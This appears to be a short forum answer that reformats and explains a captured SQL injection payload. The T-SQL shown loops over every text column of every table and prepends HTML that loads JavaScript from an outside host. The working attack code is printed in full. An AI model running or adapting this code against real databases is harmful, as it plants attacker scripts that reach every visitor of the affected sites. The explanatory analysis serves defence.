Just formatting it for readability will clarify a lot:
set ansi_warnings off
DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
select c.TABLE_NAME, c.COLUMN_NAME
from INFORMATION_SCHEMA.columns c,
INFORMATION_SCHEMA.tables t
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
and c.CHARACTER_MAXIMUM_LENGTH > 30
and t.table_name = c.table_name
and t.table_type="BASE TABLE"
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC ( 'UPDATE [' + @T + ']
SET [' + @C + '] =
''"></title>'' +
''<script src="http://lilXXXXXXXop.com/sl.php"></script>'' +
''<!--'' +
RTRIM(CONVERT(VARCHAR(6000),[' + @C + ']))
WHERE LEFT(RTRIM(CONVERT(VARCHAR(6000),[' + @C + '])), 17)
<> ''"></title><script''
'
)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
It goes through every text column of every table and inserts some HTML into it — HTML that contains a pointer to externally-generated JavaScript.